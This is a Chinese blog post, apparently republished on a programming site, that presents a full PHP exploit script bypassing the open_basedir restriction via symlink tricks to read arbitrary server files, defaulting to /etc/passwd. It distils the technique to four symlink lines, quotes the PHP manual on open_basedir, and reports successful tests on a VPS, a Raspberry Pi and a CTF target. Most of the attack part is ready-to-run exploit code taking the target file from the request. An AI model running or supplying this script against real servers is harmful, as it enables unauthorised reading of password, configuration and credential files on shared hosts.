编程 PHP

PHP5全版本绕过open_basedir读文件脚本漏洞详细介绍

Posted in PHP onJanuary 20, 2015

漏洞很久之前（大概5年前）被提出来了，但并不是php代码上的问题，所以问题一直存在，直到现在。我一直没留意，后来yaseng告诉我的，他测试了好像5.5都可以。

漏洞详情在这里 http://cxsecurity.com/issue/WLB-2009110068。

给出我写的EXP：

<?php

/*

* by phithon

* From https://3water.com

* detail: http://cxsecurity.com/issue/WLB-2009110068

*/

header('content-type: text/plain');

error_reporting(-1);

ini_set('display_errors', TRUE);

printf("open_basedir: %s\nphp_version: %s\n", ini_get('open_basedir'), phpversion());

printf("disable_functions: %s\n", ini_get('disable_functions'));

$file = str_replace('\\', '/', isset($_REQUEST['file']) ? $_REQUEST['file'] : '/etc/passwd');

$relat_file = getRelativePath(__FILE__, $file);

$paths = explode('/', $file);

$name = mt_rand() % 999;

$exp = getRandStr();

mkdir($name);

chdir($name);

for($i = 1 ; $i < count($paths) - 1 ; $i++){

  mkdir($paths[$i]);

  chdir($paths[$i]);

}

mkdir($paths[$i]);

for ($i -= 1; $i > 0; $i--) { 

  chdir('..');

}

$paths = explode('/', $relat_file);

$j = 0;

for ($i = 0; $paths[$i] == '..'; $i++) { 

  mkdir($name);

  chdir($name);

  $j++;

}

for ($i = 0; $i <= $j; $i++) { 

  chdir('..');

}

$tmp = array_fill(0, $j + 1, $name);

symlink(implode('/', $tmp), 'tmplink');

$tmp = array_fill(0, $j, '..');

symlink('tmplink/' . implode('/', $tmp) . $file, $exp);

unlink('tmplink');

mkdir('tmplink');

delfile($name);

$exp = dirname($_SERVER['SCRIPT_NAME']) . "/{$exp}";

$exp = "http://{$_SERVER['SERVER_NAME']}{$exp}";

echo "\n-----------------content---------------\n\n";

echo file_get_contents($exp);

delfile('tmplink');
function getRelativePath($from, $to) {

  // some compatibility fixes for Windows paths

  $from = rtrim($from, '\/') . '/';

  $from = str_replace('\\', '/', $from);

  $to   = str_replace('\\', '/', $to);
  $from   = explode('/', $from);

  $to     = explode('/', $to);

  $relPath  = $to;
  foreach($from as $depth => $dir) {

    // find first non-matching dir

    if($dir === $to[$depth]) {

      // ignore this directory

      array_shift($relPath);

    } else {

      // get number of remaining dirs to $from

      $remaining = count($from) - $depth;

      if($remaining > 1) {

        // add traversals up to first matching dir

        $padLength = (count($relPath) + $remaining - 1) * -1;

        $relPath = array_pad($relPath, $padLength, '..');

        break;

      } else {

        $relPath[0] = './' . $relPath[0];

      }

    }

  }

  return implode('/', $relPath);

}
function delfile($deldir){

  if (@is_file($deldir)) {

    @chmod($deldir,0777);

    return @unlink($deldir);

  }else if(@is_dir($deldir)){

    if(($mydir = @opendir($deldir)) == NULL) return false;

    while(false !== ($file = @readdir($mydir)))

    {

      $name = File_Str($deldir.'/'.$file);

      if(($file!='.') && ($file!='..')){delfile($name);}

    } 

    @closedir($mydir);

    @chmod($deldir,0777);

    return @rmdir($deldir) ? true : false;

  }

}
function File_Str($string)

{

  return str_replace('//','/',str_replace('\\','/',$string));

}
function getRandStr($length = 6) {

  $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';

  $randStr = '';

  for ($i = 0; $i < $length; $i++) {

    $randStr .= substr($chars, mt_rand(0, strlen($chars) - 1), 1);

  }

  return $randStr;

}

如我们欲读取/etc/passwd。其实原理就是创建一个链接文件x，用相对路径指向a/a/a/a，再创建一个链接文件exp指向x/../../../etc/passwd。

其实指向的就是a/a/a/a/../../../etc/passwd，其实就是./etc/passwd。

这时候删除x，再创建一个x目录，但exp还是指向x/../../../etc/passwd，所以就成功跨到/etc/passwd了。

精华就是这四句：

symlink("abc/abc/abc/abc","tmplink"); 

symlink("tmplink/../../../etc/passwd", "exploit"); 

unlink("tmplink"); 

mkdir("tmplink");

我们访问http://xxx/exp，如果服务器支持链接文件的访问，那么就能读到/etc/passwd。

其中并没有任何操作触发open_basedir，但达到的效果就是绕过了open_basedir读取任意文件。

错误不在php，但又不知道把错误归结到谁头上，所以php一直未管这个问题。

PHP5全版本绕过open_basedir读文件脚本漏洞详细介绍

open_basedir

将 PHP 所能打开的文件限制在指定的目录树，包括文件本身。本指令不受安全模式打开或者关闭的影响。

当一个脚本试图用例如 fopen() 或者 gzopen() 打开一个文件时，该文件的位置将被检查。当文件在指定的目录树之外时 PHP 将拒绝打开它。所有的符号连接都会被解析，所以不可能通过符号连接来避开此限制。

特殊值 . 指明脚本的工作目录将被作为基准目录。但这有些危险，因为脚本的工作目录可以轻易被 chdir() 而改变。

在 httpd.conf 文件中中，open_basedir 可以像其它任何配置选项一样用“php_admin_value open_basedir none”的方法关闭（例如某些虚拟主机中）。

在 Windows 中，用分号分隔目录。在任何其它系统中用冒号分隔目录。作为 Apache 模块时，父目录中的 open_basedir 路径自动被继承。

用 open_basedir 指定的限制实际上是前缀，不是目录名。也就是说“open_basedir = /dir/incl”也会允许访问“/dir/include”和“/dir/incls”，如果它们存在的话。如果要将访问限制在仅为指定的目录，用斜线结束路径名。例如：“open_basedir = /dir/incl/”。

Note:

支持多个目录是 3.0.7 加入的。

默认是允许打开所有文件。

我在我的VPS（php5.3.28 + nginx）和树莓派（php 5.4.4 + nginx）上都测试过，成功读取。

树莓派测试：

PHP5全版本绕过open_basedir读文件脚本漏洞详细介绍

相比于5.3 XML那个洞（那个很多文件读不了），这个成功率还是比较稳的，很多文件都能读。而且版本没要求，危害比较大。

前几天成信的CTF，试了下这个脚本，apache也可以读取，当时读了读kali机子的/etc/httpd/conf/httpd.conf，没啥收获。

发现没旁站，流量是通过网关转发的。

PHP5全版本绕过open_basedir读文件脚本漏洞详细介绍

- Author -

junjie

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

php中使用ExcelFileParser处理excel获得数据(可作批量导入到数据库使用)

Aug 21 PHP

PHP中用hash实现的数组

Jul 17 PHP

php gzip压缩输出的实现方法

Apr 27 PHP

PHP利用str_replace防注入的方法

Nov 10 PHP

PHP实现仿Google分页效果的分页函数

Jul 29 PHP

WordPress中获取指定分类及其子分类下的文章数目

Dec 31 PHP

PHP验证码类ValidateCode解析

Jan 07 PHP

Yii2.0使用阿里云OSS的SDK上传图片、下载、删除图片示例

Sep 20 PHP

php探针不显示内存解决方法

Sep 17 PHP

laravel 判断查询数据库返回值的例子

Oct 11 PHP

Laravel 读取 config 下的数据方法

Oct 13 PHP

ThinkPHP5.1的权限控制怎么写？分享一个AUTH权限控制

Mar 09 PHP

php中解析带中文字符的url函数分享

Jan 20 #PHP

PHP中使用正则表达式提取中文实现笔记

Jan 20 #PHP

php中的观察者模式简单实例

Jan 20 #PHP

php 5.6版本中编写一个PHP扩展的简单示例

Jan 20 #PHP

PHP函数extension_loaded()用法实例

Jan 19 #PHP

php使用正则表达式获取图片url的方法

Jan 16 #PHP

php使用CURL伪造IP和来源实例详解

Jan 15 #PHP

You might like

咖啡冲泡指南咖啡有哪些制作方式单品咖啡意式咖啡

2021/03/06 冲泡冲煮

浅析使用Turck-mmcache编译来加速、优化PHP代码

2013/06/20 PHP

PHP函数microtime()用法与说明

2013/12/04 PHP

详解CSS样式中的 !important * _ 符号

2021/03/09 HTML / CSS

js 实现无缝滚动兼容IE和FF

2009/07/15 Javascript

vs2003 js文件编码问题的解决方法

2010/03/20 Javascript

Js四则运算函数代码

2012/07/21 Javascript

jquery怎样实现ajax联动框(一)

2013/03/08 Javascript

javascript实现iframe框架延时加载的方法

2014/10/30 Javascript

JS判断是否360安全浏览器极速内核的方法

2015/01/29 Javascript

jQuery实现响应鼠标背景变化的动态菜单效果代码

2015/08/27 Javascript

Angularjs中如何使用filterFilter函数过滤

2016/02/06 Javascript

Javascript字符串拼接小技巧(推荐)

2016/06/02 Javascript

Javascript动画效果（2）

2016/10/11 Javascript

深入理解ES6中let和闭包

2018/02/22 Javascript

对mac下nodejs 更新到最新版本的最新方法(推荐)

2018/05/17 NodeJs

JavaScript高级函数应用之分时函数实例分析

2018/08/03 Javascript

layer弹出层自定义提交取消按钮的例子

2019/09/10 Javascript

通过Kettle自定义jar包供javascript使用

2020/01/29 Javascript

[45:25]OG vs EG 2019国际邀请赛淘汰赛胜者组 BO3 第一场 8.22

2019/09/05 DOTA

Python实现七彩蟒蛇绘制实例代码

2018/01/16 Python

《与孩子一起学编程》python自测题

2018/05/27 Python

Python实现的微信好友数据分析功能示例

2018/06/21 Python

Python3.4学习笔记之常用操作符,条件分支和循环用法示例

2019/03/01 Python

Python 使用folium绘制leaflet地图的实现方法

2019/07/05 Python

PyQt5如何将.ui文件转换为.py文件的实例代码

2020/05/26 Python

使用PyCharm安装pytest及requests的问题

2020/07/31 Python

jupyter使用自动补全和切换默认浏览器的方法

2020/11/18 Python

Carrs Silver官网：英国著名的银器品牌

2020/08/29 全球购物

上海微创软件面试题

2012/06/14 面试题

机械设计制造专业个人求职信

2013/09/25 职场文书

十八大闭幕感言

2014/01/22 职场文书

迟到检讨书大全

2014/01/25 职场文书

2015年大学生实习评语

2015/03/25 职场文书

2015年学校少先队工作总结

2015/07/20 职场文书

2019餐饮行业创业计划书！

2019/06/27 职场文书